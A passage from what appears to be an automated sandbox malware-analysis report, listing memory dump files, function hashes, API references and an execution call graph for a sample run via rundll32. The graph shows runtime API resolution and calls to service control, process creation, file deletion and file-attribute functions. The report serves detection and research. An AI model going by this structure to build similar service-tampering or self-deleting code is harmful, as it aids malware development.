                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253506028-0
                                                                                                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                                                                                                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
                                                                                                          • TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969253408-0
                                                                                                          • Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
                                                                                                          • Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:18.7%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0.1%
                                                                                                          Total number of Nodes:1076
                                                                                                          Total number of Limit Nodes:17

                                                                                                          Graph

                                                                                                          execution_graph 3904 4cbf1cb 3909 4cb8636 3904->3909 3906 4cbf26d 3946 4ccd11a 3906->3946 3908 4cbf281 3941 4cb9ad5 3909->3941 3910 4cba3e5 4162 4cc27f9 3910->4162 3912 4cd0e63 GetPEB RtlAllocateHeap 3912->3941 3916 4cba3c7 4049 4cd17bd 3916->4049 3918 4cba3c5 3918->3906 3927 4cc3d85 GetPEB RtlAllocateHeap 3927->3941 3938 4cd2b09 GetPEB RtlFreeHeap 3938->3941 3941->3910 3941->3912 3941->3916 3941->3918 3941->3927 3941->3938 3942 4ccfecb GetPEB RtlFreeHeap 3941->3942 3949 4cc2142 3941->3949 3963 4cb670b 3941->3963 3971 4cd2699 3941->3971 3975 4cbde74 3941->3975 3985 4cce955 3941->3985 3996 4cd2009 3941->3996 4007 4cbd14c 3941->4007 4020 4cc4a66 3941->4020 4030 4ccad08 3941->4030 4040 4cba445 3941->4040 4059 4cd1028 3941->4059 4063 4cc4f74 3941->4063 4071 4cb77a3 3941->4071 4076 4cb30e7 3941->4076 4081 4ccbd13 3941->4081 4085 4ccd1bc 3941->4085 4095 4cbbdf9 3941->4095 4098 4cc3eaa 3941->4098 4104 4cb4b5d 3941->4104 4107 4cbc6b8 3941->4107 4120 4ccc5d5 3941->4120 4124 4ccfbde 3941->4124 4129 4ccc387 3941->4129 4134 4cce4e5 3941->4134 4146 4cc9a01 3941->4146 4155 4cc8d3d 3941->4155 3942->3941 3947 4cbeb52 GetPEB 3946->3947 3948 4ccd1b1 ExitProcess 3947->3948 3948->3908 3955 4cc2628 3949->3955 3951 4cc27af 4196 4cd2b09 3951->4196 3953 4cc2793 4192 4cbf7fe 3953->4192 3955->3951 3955->3953 3958 4cbc5d8 GetPEB RtlAllocateHeap 3955->3958 3961 4cc2791 3955->3961 4176 4cce1f8 3955->4176 4180 4cb738a 3955->4180 4184 4cc8b9e 3955->4184 4188 4ccfecb 3955->4188 3958->3955 3961->3941 3962 4cd2b09 2 API calls 3962->3961 3968 4cb6a16 3963->3968 3969 4cb6b43 3968->3969 4248 4cd45ca 3968->4248 4252 4ccdbc1 3968->4252 4256 4cd1538 3968->4256 4260 4cd0db1 3968->4260 4264 4ccca1f 3968->4264 3969->3941 3972 4cd26b3 3971->3972 3973 4ccff58 LoadLibraryW GetPEB RtlFreeHeap RtlAllocateHeap 3972->3973 3974 4cd27a6 3972->3974 3973->3972 3974->3941 3982 4cbe069 3975->3982 3976 4cbe1e6 4290 4cb54b6 3976->4290 3979 4cbe1e4 3979->3941 3981 4cd2b09 2 API calls 3981->3982 3982->3976 3982->3979 3982->3981 4272 4cc8c7d 3982->4272 4276 4cbc307 3982->4276 4279 4cce0f2 3982->4279 4283 4ccf840 3982->4283 3991 4ccedaa 3985->3991 3986 4cd45ca 2 API calls 3986->3991 3987 4ccefc1 3988 4cd1538 2 API calls 3987->3988 3990 4ccefbf 3988->3990 3989 4cce1f8 2 API calls 3989->3991 3990->3941 3991->3986 3991->3987 3991->3989 3991->3990 3994 4ccca1f GetPEB 3991->3994 3995 4ccfecb 2 API calls 3991->3995 4298 4cd44ff 3991->4298 4302 4cd2d0a 3991->4302 3994->3991 3995->3991 4309 4cb556b 3996->4309 3998 4cce1f8 GetPEB RtlAllocateHeap 4006 4cd2465 3998->4006 3999 4cd25bf 4312 4cc654a 3999->4312 4001 4cd25bd 4001->3941 4002 4cd2d0a GetPEB 4002->4006 4004 4ccfecb GetPEB RtlFreeHeap 4004->4006 4006->3998 4006->3999 4006->4001 4006->4002 4006->4004 4326 4cbdc1b 4006->4326 4329 4cd44ad 4006->4329 4018 4cbd807 4007->4018 4008 4cbda79 4010 4cb3046 GetPEB 4008->4010 4013 4cbda77 4010->4013 4013->3941 4014 4cce1f8 2 API calls 4014->4018 4018->4008 4018->4013 4018->4014 4019 4ccfecb 2 API calls 4018->4019 4353 4ccb257 4018->4353 4366 4cb3046 4018->4366 4370 4cc7c4e 4018->4370 4374 4cbf96f 4018->4374 4378 4cce8b6 4018->4378 4382 4cb1a34 4018->4382 4019->4018 4023 4cc4ded 4020->4023 4021 4cb1a34 GetPEB 4021->4023 4022 4cb3046 GetPEB 4022->4023 4023->4021 4023->4022 4024 4cbc5d8 2 API calls 4023->4024 4026 4cc4f25 4023->4026 4028 4cce8b6 2 API calls 4023->4028 4029 4cc4f23 4023->4029 4402 4cc07f4 4023->4402 4024->4023 4027 4cd0db1 GetPEB 4026->4027 4027->4029 4028->4023 4029->3941 4035 4ccb06a 4030->4035 4031 4cd0db1 GetPEB 4031->4035 4032 4cce1f8 2 API calls 4032->4035 4033 4ccb173 4413 4cc7a0f 4033->4413 4034 4cc654a GetPEB 4034->4035 4035->4031 4035->4032 4035->4033 4035->4034 4036 4ccb171 4035->4036 4038 4cd2d0a GetPEB 4035->4038 4039 4ccfecb 2 API calls 4035->4039 4036->3941 4038->4035 4039->4035 4047 4cba713 4040->4047 4042 4cba84e 4044 4cb3046 GetPEB 4042->4044 4043 4cbee62 2 API calls 4043->4047 4045 4cba84c 4044->4045 4045->3941 4046 4cce8b6 2 API calls 4046->4047 4047->4042 4047->4043 4047->4045 4047->4046 4048 4cb3046 GetPEB 4047->4048 4431 4cb1e9b 4047->4431 4048->4047 4058 4cd17de 4049->4058 4050 4cd1f31 4435 4cc85ff 4050->4435 4052 4cd1f2f 4052->3918 4053 4cb1a34 GetPEB 4053->4058 4054 4cce1f8 GetPEB RtlAllocateHeap 4054->4058 4056 4ccfecb GetPEB RtlFreeHeap 4056->4058 4057 4cbf96f GetPEB 4057->4058 4058->4050 4058->4052 4058->4053 4058->4054 4058->4056 4058->4057 4445 4cbbf5f 4058->4445 4060 4cd1041 4059->4060 4061 4cbeb52 GetPEB 4060->4061 4062 4cd10cd 4061->4062 4062->3941 4068 4cc522f 4063->4068 4066 4cc5328 4066->3941 4067 4cce1f8 2 API calls 4067->4068 4068->4066 4068->4067 4069 4cd2d0a GetPEB 4068->4069 4070 4ccfecb 2 API calls 4068->4070 4453 4cc09dd 4068->4453 4457 4cc437a 4068->4457 4069->4068 4070->4068 4074 4cb77cc 4071->4074 4072 4cb7e67 4072->3941 4073 4cbc5d8 2 API calls 4073->4074 4074->4072 4074->4073 4075 4cccad5 GetPEB 4074->4075 4075->4074 4080 4cb31a7 4076->4080 4078 4cb325b 4078->3941 4080->4078 4481 4cd161b 4080->4481 4485 4cd2a36 4080->4485 4082 4ccbd2c 4081->4082 4083 4cbeb52 GetPEB 4082->4083 4084 4ccbdd2 4083->4084 4084->3941 4094 4ccd202 4085->4094 4086 4ccfe2a GetPEB 4086->4094 4088 4cd2b09 GetPEB RtlFreeHeap 4088->4094 4092 4ccd8c2 4092->3941 4094->4086 4094->4088 4094->4092 4489 4cb6b7a 4094->4489 4497 4cc5779 4094->4497 4509 4cb80c0 4094->4509 4519 4cc2e5d 4094->4519 4537 4cc67e6 4094->4537 4096 4cbc5d8 2 API calls 4095->4096 4097 4cbbe8c 4096->4097 4097->3941 4099 4cc4051 4098->4099 4100 4cc416b 4099->4100 4101 4cc09dd GetPEB 4099->4101 4689 4cbdd35 4099->4689 4692 4cc0aba 4099->4692 4100->3941 4101->4099 4105 4cd1028 GetPEB 4104->4105 4106 4cb4bf5 4105->4106 4106->3941 4118 4cbcdac 4107->4118 4108 4cce1f8 GetPEB RtlAllocateHeap 4108->4118 4109 4cc00c5 GetPEB 4109->4118 4111 4cbcdf0 4730 4cb53d0 4111->4730 4112 4cb1a34 GetPEB 4112->4118 4113 4cbf96f GetPEB 4113->4118 4115 4cbd05c 4115->4115 4117 4ccfecb GetPEB RtlFreeHeap 4117->4118 4118->4108 4118->4109 4118->4111 4118->4112 4118->4113 4118->4115 4118->4117 4734 4cc2cd9 4118->4734 4738 4cb2dea 4118->4738 4123 4ccc7d3 4120->4123 4121 4cbdc1b GetPEB 4121->4123 4122 4ccc8ad 4122->3941 4123->4121 4123->4122 4125 4ccfcf5 4124->4125 4127 4ccfd44 4125->4127 4128 4cbc5d8 2 API calls 4125->4128 4742 4cc9df5 4125->4742 4127->3941 4128->4125 4130 4cb556b GetPEB 4129->4130 4131 4ccc401 4130->4131 4771 4ccb19c 4131->4771 4135 4cce50b 4134->4135 4136 4cbc5d8 2 API calls 4135->4136 4142 4cce8a9 4135->4142 4775 4cc7d5b 4135->4775 4795 4cd00ef 4135->4795 4807 4cbb820 4135->4807 4814 4cba871 4135->4814 4835 4ccccd9 4135->4835 4843 4cb238c 4135->4843 4864 4cca474 4135->4864 4884 4cd2d53 4135->4884 4136->4135 4142->3941 4149 4cc9a1f 4146->4149 4148 4cc9c42 4150 4cd2b09 2 API calls 4148->4150 4149->4148 4151 4cc9c40 4149->4151 4154 4cbc5d8 2 API calls 4149->4154 4997 4cbdca0 4149->4997 5001 4cd3ee9 4149->5001 5011 4cb3271 4149->5011 4150->4151 4151->3941 4154->4149 4157 4cc8f0d 4155->4157 4158 4cbc5d8 2 API calls 4157->4158 4159 4cc8f1d 4157->4159 4160 4cc8f3c 4157->4160 5106 4cb48dd 4157->5106 4158->4157 4161 4cc0ebc GetPEB 4159->4161 4160->3941 4161->4160 4170 4cc2b33 4162->4170 4164 4cc2c60 4167 4cc09dd GetPEB 4164->4167 4166 4cc654a GetPEB 4166->4170 4169 4cc2c75 4167->4169 4168 4cce1f8 2 API calls 4168->4170 5124 4cb856e 4169->5124 4170->4164 4170->4166 4170->4168 4172 4cba445 3 API calls 4170->4172 4173 4cc2c5e 4170->4173 4174 4cd2d0a GetPEB 4170->4174 4175 4ccfecb 2 API calls 4170->4175 5110 4ccdc71 4170->5110 5118 4cb1ca1 4170->5118 4172->4170 4173->3918 4174->4170 4175->4170 4177 4cce211 4176->4177 4202 4cbc5d8 4177->4202 4181 4cb73a9 4180->4181 4182 4cbeb52 GetPEB 4181->4182 4183 4cb742e 4182->4183 4183->3955 4185 4cc8bc0 4184->4185 4186 4cbeb52 GetPEB 4185->4186 4187 4cc8c6a 4186->4187 4187->3955 4189 4ccfee3 4188->4189 4190 4cd2b09 2 API calls 4189->4190 4191 4ccff4f 4190->4191 4191->3955 4193 4cbf814 4192->4193 4194 4cbeb52 GetPEB 4193->4194 4195 4cbf892 4194->4195 4195->3961 4197 4cd2b1f 4196->4197 4198 4cd28eb GetPEB 4197->4198 4199 4cd2bd9 4198->4199 4244 4cc0c2a 4199->4244 4201 4cc27c9 4201->3962 4207 4cd28eb 4202->4207 4206 4cbc6b1 4206->3955 4214 4cbeb52 4207->4214 4210 4cc648a 4211 4cc64a6 4210->4211 4212 4cbeb52 GetPEB 4211->4212 4213 4cc6539 RtlAllocateHeap 4212->4213 4213->4206 4215 4cbebf7 4214->4215 4216 4cbc69c 4214->4216 4220 4cc567b 4215->4220 4216->4210 4218 4cbec06 4223 4cbec31 4218->4223 4227 4cbf7f7 GetPEB 4220->4227 4222 4cc573b 4222->4218 4225 4cbec50 4223->4225 4224 4cbed2e 4224->4216 4225->4224 4228 4cb7e79 4225->4228 4227->4222 4229 4cb7fa7 4228->4229 4236 4cb801a 4229->4236 4232 4cb7fe4 4234 4cbec31 GetPEB 4232->4234 4235 4cb8011 4232->4235 4234->4235 4235->4224 4237 4cb802d 4236->4237 4238 4cbeb52 GetPEB 4237->4238 4239 4cb7fcb 4238->4239 4239->4232 4240 4cb483c 4239->4240 4241 4cb484c 4240->4241 4242 4cbeb52 GetPEB 4241->4242 4243 4cb48d1 4242->4243 4243->4232 4245 4cc0c42 4244->4245 4246 4cbeb52 GetPEB 4245->4246 4247 4cc0ce9 RtlFreeHeap 4246->4247 4247->4201 4249 4cd45fd 4248->4249 4250 4cbeb52 GetPEB 4249->4250 4251 4cd46a3 CreateFileW 4250->4251 4251->3968 4253 4ccdbe1 4252->4253 4254 4cbeb52 GetPEB 4253->4254 4255 4ccdc5f 4254->4255 4255->3968 4257 4cd1548 4256->4257 4258 4cbeb52 GetPEB 4257->4258 4259 4cd160f FindCloseChangeNotification 4258->4259 4259->3968 4261 4cd0dcc 4260->4261 4268 4ccbb96 4261->4268 4265 4ccca35 4264->4265 4266 4cbeb52 GetPEB 4265->4266 4267 4cccac9 4266->4267 4267->3968 4269 4ccbbbe 4268->4269 4270 4cbeb52 GetPEB 4269->4270 4271 4ccbc5c 4270->4271 4271->3968 4273 4cc8c96 4272->4273 4274 4cbeb52 GetPEB 4273->4274 4275 4cc8d2f 4274->4275 4275->3982 4277 4cbeb52 GetPEB 4276->4277 4278 4cbc39e 4277->4278 4278->3982 4280 4cce10e 4279->4280 4281 4cbeb52 GetPEB 4280->4281 4282 4cce19c 4281->4282 4282->3982 4285 4ccf859 4283->4285 4284 4cca1c0 GetPEB 4284->4285 4285->4284 4286 4cbc5d8 2 API calls 4285->4286 4287 4ccfb19 4285->4287 4289 4ccfb47 4285->4289 4286->4285 4294 4cca1c0 4287->4294 4289->3982 4291 4cb54c9 4290->4291 4292 4cbeb52 GetPEB 4291->4292 4293 4cb555f 4292->4293 4293->3979 4295 4cca1f0 4294->4295 4296 4cbeb52 GetPEB 4295->4296 4297 4cca28c 4296->4297 4297->4289 4299 4cd451c 4298->4299 4300 4cbeb52 GetPEB 4299->4300 4301 4cd45b7 SetFileInformationByHandle 4300->4301 4301->3991 4303 4cd2d2f 4302->4303 4306 4cd31aa 4303->4306 4307 4cbeb52 GetPEB 4306->4307 4308 4cd2d4b 4307->4308 4308->3991 4310 4cbeb52 GetPEB 4309->4310 4311 4cb55f6 4310->4311 4311->4006 4313 4cc6564 4312->4313 4333 4ccfe2a 4313->4333 4316 4ccfe2a GetPEB 4317 4cc6761 4316->4317 4318 4ccfe2a GetPEB 4317->4318 4319 4cc6774 4318->4319 4337 4cbe204 4319->4337 4322 4cbe204 GetPEB 4323 4cc679e 4322->4323 4341 4cbe4f8 4323->4341 4327 4cbeb52 GetPEB 4326->4327 4328 4cbdc97 4327->4328 4328->4006 4330 4cd44d8 4329->4330 4331 4cd31aa GetPEB 4330->4331 4332 4cd44f7 4331->4332 4332->4006 4334 4ccfe3d 4333->4334 4345 4cbc28c 4334->4345 4338 4cbe217 4337->4338 4339 4cbeb52 GetPEB 4338->4339 4340 4cbe2ae 4339->4340 4340->4322 4342 4cbe511 4341->4342 4343 4cbeb52 GetPEB 4342->4343 4344 4cbe5b5 4343->4344 4344->4001 4346 4cbc2a9 4345->4346 4349 4cb76e0 4346->4349 4350 4cb76f8 4349->4350 4351 4cbeb52 GetPEB 4350->4351 4352 4cb7793 4351->4352 4352->4316 4364 4ccb27f 4353->4364 4354 4ccbb76 4356 4cd2b09 2 API calls 4354->4356 4355 4cbc5d8 GetPEB RtlAllocateHeap 4355->4364 4357 4ccbb89 4356->4357 4357->4018 4361 4cd2b09 2 API calls 4361->4364 4363 4cbdc1b GetPEB 4363->4364 4364->4354 4364->4355 4364->4357 4364->4361 4364->4363 4365 4cb3046 GetPEB 4364->4365 4386 4cbee62 4364->4386 4390 4cbfa95 4364->4390 4394 4ccfd4e 4364->4394 4398 4cbc3a7 4364->4398 4365->4364 4367 4cb305c 4366->4367 4368 4cbeb52 GetPEB 4367->4368 4369 4cb30db 4368->4369 4369->4018 4371 4cc7c9b 4370->4371 4372 4cbeb52 GetPEB 4371->4372 4373 4cc7d35 4372->4373 4373->4018 4375 4cbf997 4374->4375 4376 4cd31aa GetPEB 4375->4376 4377 4cbf9b9 4376->4377 4377->4018 4379 4cce8d0 4378->4379 4380 4cbeb52 GetPEB 4379->4380 4381 4cce946 OpenSCManagerW 4380->4381 4381->4018 4383 4cb1a59 4382->4383 4384 4cbeb52 GetPEB 4383->4384 4385 4cb1aeb 4384->4385 4385->4018 4387 4cbee81 4386->4387 4388 4cbeb52 GetPEB 4387->4388 4389 4cbeefb OpenServiceW 4388->4389 4389->4364 4391 4cbfad4 4390->4391 4392 4cbeb52 GetPEB 4391->4392 4393 4cbfb70 4392->4393 4393->4364 4395 4ccfd79 4394->4395 4396 4cbeb52 GetPEB 4395->4396 4397 4ccfe12 4396->4397 4397->4364 4399 4cbc3c9 4398->4399 4400 4cbeb52 GetPEB 4399->4400 4401 4cbc463 4400->4401 4401->4364 4408 4cc08fe 4402->4408 4403 4cc09b7 4406 4cbe204 GetPEB 4403->4406 4404 4cc09b5 4404->4023 4405 4cd0db1 GetPEB 4405->4408 4406->4404 4408->4403 4408->4404 4408->4405 4409 4cc00c5 4408->4409 4410 4cc00d8 4409->4410 4411 4cbeb52 GetPEB 4410->4411 4412 4cc0170 4411->4412 4412->4408 4414 4cc7a2c 4413->4414 4415 4cce1f8 2 API calls 4414->4415 4416 4cc7bfe 4415->4416 4423 4cc2c9c 4416->4423 4419 4ccfecb 2 API calls 4420 4cc7c2e 4419->4420 4427 4cbd061 4420->4427 4422 4cc7c45 4422->4036 4424 4cc2cb8 4423->4424 4425 4cd31aa GetPEB 4424->4425 4426 4cc2cd1 4425->4426 4426->4419 4428 4cbd07a 4427->4428 4429 4cbeb52 GetPEB 4428->4429 4430 4cbd141 DeleteFileW 4429->4430 4430->4422 4432 4cb1eb4 4431->4432 4433 4cbeb52 GetPEB 4432->4433 4434 4cb1f2d 4433->4434 4434->4047 4436 4cc8626 4435->4436 4437 4ccfe2a GetPEB 4436->4437 4438 4cc878e 4437->4438 4449 4cd2c24 4438->4449 4440 4cc87c7 4441 4cc87d2 4440->4441 4442 4cd1538 2 API calls 4440->4442 4441->4052 4443 4cc87ec 4442->4443 4444 4cd1538 2 API calls 4443->4444 4444->4441 4446 4cbbf93 4445->4446 4447 4cd31aa GetPEB 4446->4447 4448 4cbbfb6 4447->4448 4448->4058 4450 4cd2c57 4449->4450 4451 4cbeb52 GetPEB 4450->4451 4452 4cd2ced CreateProcessW 4451->4452 4452->4440 4454 4cc09f3 4453->4454 4455 4cbeb52 GetPEB 4454->4455 4456 4cc0a85 4455->4456 4456->4068 4459 4cc43a8 4457->4459 4460 4cc4a52 4459->4460 4463 4cce1f8 GetPEB RtlAllocateHeap 4459->4463 4464 4cc4a50 4459->4464 4465 4cc2c9c GetPEB 4459->4465 4466 4cd2d0a GetPEB 4459->4466 4467 4cc437a 3 API calls 4459->4467 4468 4ccfecb GetPEB RtlFreeHeap 4459->4468 4469 4cc2da7 4459->4469 4473 4cd0f1e 4459->4473 4477 4cbbea1 4460->4477 4463->4459 4464->4068 4465->4459 4466->4459 4467->4459 4468->4459 4470 4cc2dbd 4469->4470 4471 4cbeb52 GetPEB 4470->4471 4472 4cc2e4f 4471->4472 4472->4459 4474 4cd0f37 4473->4474 4475 4cbeb52 GetPEB 4474->4475 4476 4cd0ff6 4475->4476 4476->4459 4478 4cbbeb1 4477->4478 4479 4cbeb52 GetPEB 4478->4479 4480 4cbbf53 4479->4480 4480->4464 4482 4cd1631 4481->4482 4483 4cbeb52 GetPEB 4482->4483 4484 4cd16b5 4483->4484 4484->4080 4486 4cd2a49 4485->4486 4487 4cbeb52 GetPEB 4486->4487 4488 4cd2afe 4487->4488 4488->4080 4495 4cb6b9c 4489->4495 4490 4cd2b09 2 API calls 4490->4495 4492 4cb706b 4492->4094 4494 4cbc5d8 2 API calls 4494->4495 4495->4490 4495->4492 4495->4494 4554 4cd07aa 4495->4554 4559 4ccc9b0 4495->4559 4563 4cd46bd 4495->4563 4508 4cc57ab 4497->4508 4499 4cd2b09 2 API calls 4499->4508 4500 4cc6086 4501 4cd2b09 2 API calls 4500->4501 4504 4cc6084 4501->4504 4502 4cb57b8 3 API calls 4502->4508 4504->4094 4506 4ccc9b0 GetPEB 4506->4508 4507 4cbc5d8 2 API calls 4507->4508 4508->4499 4508->4500 4508->4502 4508->4504 4508->4506 4508->4507 4612 4cb5026 4508->4612 4616 4cbe7de 4508->4616 4621 4cbfb8e 4508->4621 4513 4cb83f1 4509->4513 4510 4cce1f8 2 API calls 4510->4513 4511 4cb854c 4512 4cd2b09 2 API calls 4511->4512 4517 4cb854a 4512->4517 4513->4510 4513->4511 4515 4cd31aa GetPEB 4513->4515 4516 4cbc5d8 2 API calls 4513->4516 4513->4517 4518 4ccfecb 2 API calls 4513->4518 4628 4cd0a64 4513->4628 4515->4513 4516->4513 4517->4094 4518->4513 4535 4cc393f 4519->4535 4520 4cbc5d8 GetPEB RtlAllocateHeap 4520->4535 4521 4cc4244 2 API calls 4521->4535 4522 4cc3d59 4525 4cd2b09 2 API calls 4522->4525 4524 4ccc9b0 GetPEB 4524->4535 4526 4cc3a00 4525->4526 4526->4094 4527 4cc3992 4633 4cc4244 4527->4633 4528 4cce1f8 2 API calls 4528->4535 4530 4cc39af 4637 4cb3325 4530->4637 4531 4cd31aa GetPEB 4531->4535 4534 4ccfecb 2 API calls 4534->4526 4535->4520 4535->4521 4535->4522 4535->4524 4535->4526 4535->4527 4535->4528 4535->4531 4536 4ccfecb GetPEB RtlFreeHeap 4535->4536 4641 4cce1ac 4535->4641 4536->4535 4553 4cc6859 4537->4553 4540 4cce1f8 2 API calls 4540->4553 4541 4cc792e 4677 4cce358 4541->4677 4544 4cc7943 4544->4094 4545 4cce358 GetPEB 4545->4553 4547 4cd2b09 2 API calls 4547->4553 4550 4ccfecb 2 API calls 4550->4553 4551 4cd3e0e GetPEB 4551->4553 4553->4540 4553->4541 4553->4544 4553->4545 4553->4547 4553->4550 4553->4551 4645 4cbed66 4553->4645 4649 4cbdda9 4553->4649 4653 4cb4bfc 4553->4653 4662 4cd10dc 4553->4662 4666 4cbef0c 4553->4666 4669 4cb4a88 4553->4669 4673 4ccc8cf 4553->4673 4555 4cd07c6 4554->4555 4558 4cd0a10 4555->4558 4569 4cb57b8 4555->4569 4584 4cd4d53 4555->4584 4558->4495 4560 4ccc9cc 4559->4560 4608 4cbdb68 4560->4608 4564 4cd46ed 4563->4564 4565 4cd2b09 2 API calls 4564->4565 4566 4cbc5d8 2 API calls 4564->4566 4567 4cd4d2e 4564->4567 4568 4cd11b0 GetPEB 4564->4568 4565->4564 4566->4564 4567->4495 4568->4564 4581 4cb57fa 4569->4581 4571 4cce1f8 GetPEB RtlAllocateHeap 4571->4581 4572 4cbc5d8 2 API calls 4572->4581 4574 4cb66de 4575 4cbf7fe GetPEB 4574->4575 4577 4cb66dc 4575->4577 4577->4555 4578 4cb738a GetPEB 4578->4581 4579 4cd2b09 2 API calls 4579->4581 4581->4571 4581->4572 4581->4574 4581->4577 4581->4578 4581->4579 4583 4ccfecb GetPEB RtlFreeHeap 4581->4583 4588 4cccbe9 4581->4588 4592 4cb22c9 4581->4592 4596 4cb1bc9 4581->4596 4600 4cbf288 4581->4600 4604 4cd12c1 4581->4604 4583->4581 4585 4cd4d85 4584->4585 4586 4cbeb52 GetPEB 4585->4586 4587 4cd4e23 4586->4587 4587->4555 4589 4cccc0e 4588->4589 4590 4cbeb52 GetPEB 4589->4590 4591 4cccc8d 4590->4591 4591->4581 4593 4cb22e8 4592->4593 4594 4cbeb52 GetPEB 4593->4594 4595 4cb2377 4594->4595 4595->4581 4597 4cb1bfb 4596->4597 4598 4cbeb52 GetPEB 4597->4598 4599 4cb1c85 4598->4599 4599->4581 4601 4cbf2b2 4600->4601 4602 4cbeb52 GetPEB 4601->4602 4603 4cbf350 4602->4603 4603->4581 4605 4cd12da 4604->4605 4606 4cbeb52 GetPEB 4605->4606 4607 4cd1380 4606->4607 4607->4581 4609 4cbdb84 4608->4609 4610 4cbeb52 GetPEB 4609->4610 4611 4cbdc0b 4610->4611 4611->4495 4613 4cb503c 4612->4613 4614 4ccc9b0 GetPEB 4613->4614 4615 4cb50e1 4614->4615 4615->4508 4618 4cbe806 4616->4618 4617 4cccad5 GetPEB 4617->4618 4618->4617 4619 4cbc5d8 2 API calls 4618->4619 4620 4cbeb40 4618->4620 4619->4618 4620->4508 4623 4cbfbad 4621->4623 4622 4cbc5d8 2 API calls 4622->4623 4623->4622 4624 4cc0084 4623->4624 4625 4cc0086 4623->4625 4626 4cb2194 GetPEB 4623->4626 4624->4508 4627 4cd2b09 2 API calls 4625->4627 4626->4623 4627->4624 4630 4cd0a7e 4628->4630 4629 4ccc4f8 GetPEB 4629->4630 4630->4629 4631 4cbc5d8 2 API calls 4630->4631 4632 4cd0da7 4630->4632 4631->4630 4632->4513 4634 4cc425e 4633->4634 4635 4cbc5d8 2 API calls 4634->4635 4636 4cc430e 4635->4636 4636->4530 4636->4636 4638 4cb333e 4637->4638 4639 4cd31aa GetPEB 4638->4639 4640 4cb335a 4639->4640 4640->4534 4642 4cce1ce 4641->4642 4643 4cd31aa GetPEB 4642->4643 4644 4cce1f0 4643->4644 4644->4535 4646 4cbeda1 4645->4646 4647 4cbeb52 GetPEB 4646->4647 4648 4cbee49 4647->4648 4648->4553 4650 4cbddcb 4649->4650 4651 4cbeb52 GetPEB 4650->4651 4652 4cbde63 4651->4652 4652->4553 4660 4cb4ec7 4653->4660 4655 4cb4fee 4656 4cb5009 4655->4656 4657 4cd2b09 2 API calls 4655->4657 4656->4553 4657->4656 4658 4cbc5d8 GetPEB RtlAllocateHeap 4658->4660 4659 4ccc9b0 GetPEB 4659->4660 4660->4655 4660->4658 4660->4659 4661 4cd2b09 2 API calls 4660->4661 4681 4cc9c65 4660->4681 4661->4660 4663 4cd1100 4662->4663 4664 4cbeb52 GetPEB 4663->4664 4665 4cd119a 4664->4665 4665->4553 4685 4cc60b8 4666->4685 4670 4cb4abc 4669->4670 4671 